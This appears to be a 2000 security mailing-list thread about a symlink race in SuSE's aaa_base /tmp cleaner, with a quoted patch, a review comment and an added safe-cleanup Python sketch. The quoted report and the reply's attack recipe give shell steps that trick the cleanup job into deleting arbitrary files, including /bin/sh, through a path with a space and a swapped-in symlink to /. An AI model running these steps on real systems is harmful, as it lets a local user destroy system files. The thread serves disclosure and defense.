On Fri, 21 Apr 2000, Peter Münster wrote:
> If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local
> user can delete arbitrary files by doing some commands like these:
> mkdir -p "/tmp/hhh /somedirectory"
> touch -t some-early-date "/tmp/hhh /somedirectory/somefile"
> sleep 1d
...
> Here a possible patch for suse-package aaa_base-2000.1.3-0:
...
> + find $TMP_DIR/. $OMIT ! -type d \
> + -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';'
> + find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \
> + -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';'
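Review bot: both `-exec rm -f '{}' ';'` and `-exec rmdir '{}' ';'` hand a full pathname to a separate program, which resolves that pathname again from the start after find has finished its tests, and nothing in the hunk checks that the directory components are still the ones find walked. Consider removing entries relative to the directory find is currently in (GNU find's `-execdir` or `-delete`, where the installed version has them) instead of by path. Two smaller points: `-mindepth 1` is placed after the tests `-type d -empty`, while GNU find expects it before them, and `$TMP_DIR` should be quoted.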
mkdir -p /tmp/somedirectory/{_junk,bin}
fill_with_lots_of_junk_to_slow_find_down /tmp/somedirectory/_junk
find /tmp/somedirectory -type f | xargs touch -t some-early-date
touch -t some-early-date /tmp/somedirectory/bin/sh
wait_until_aaa_base_starts_searching /tmp/somedirectory/_junk
mv /tmp/somedirectory /tmp/somedirectory2
ln -s / /tmp/somedirectory
watch /bin/sh disappear...this will teach you not to use find and
rm to clean /tmp :)
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
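For contrast with the find-plus-rm approach discussed in this thread, here is an added sketch of a cleaner that works only through open directory descriptors. It is not code from the original post or from aaa_base; the function names `open_subdir` and `clean_old` are hypothetical, and it assumes Python 3 on Linux.

```python
import os
import stat
import time

def open_subdir(dirfd, name):
    """Open `name` below dirfd as a directory, refusing symlinks; None on failure."""
    flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    try:
        return os.open(name, flags, dir_fd=dirfd)
    except OSError:
        return None  # a symlink, gone, or no longer a directory

def clean_old(dirfd, max_days, now=None):
    """Unlink non-directories below dirfd whose atime is older than max_days.

    Every call is relative to an already-open directory descriptor, so a
    renamed parent or a symlink put in its place cannot redirect an unlink.
    Returns the number of entries removed.
    """
    now = time.time() if now is None else now
    cutoff = now - max_days * 86400
    here_dev = os.fstat(dirfd).st_dev
    removed = 0
    for name in os.listdir(dirfd):
        try:
            st = os.stat(name, dir_fd=dirfd, follow_symlinks=False)
        except FileNotFoundError:
            continue  # removed by someone else in the meantime
        if stat.S_ISDIR(st.st_mode):
            sub = open_subdir(dirfd, name)
            if sub is None:
                continue
            try:
                sub_st = os.fstat(sub)
                same_object = (sub_st.st_dev, sub_st.st_ino) == (st.st_dev, st.st_ino)
                # descend only into the directory we examined, on this filesystem
                if same_object and sub_st.st_dev == here_dev:
                    removed += clean_old(sub, max_days, now)
            finally:
                os.close(sub)
        elif st.st_atime < cutoff:
            try:
                os.unlink(name, dir_fd=dirfd)  # removes the entry in dirfd only
                removed += 1
            except FileNotFoundError:
                pass
    return removed
```

Old symlinks are unlinked as links and never followed, and directories themselves are left in place.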
"Resistance is futile. Open your source code and prepare for assimilation."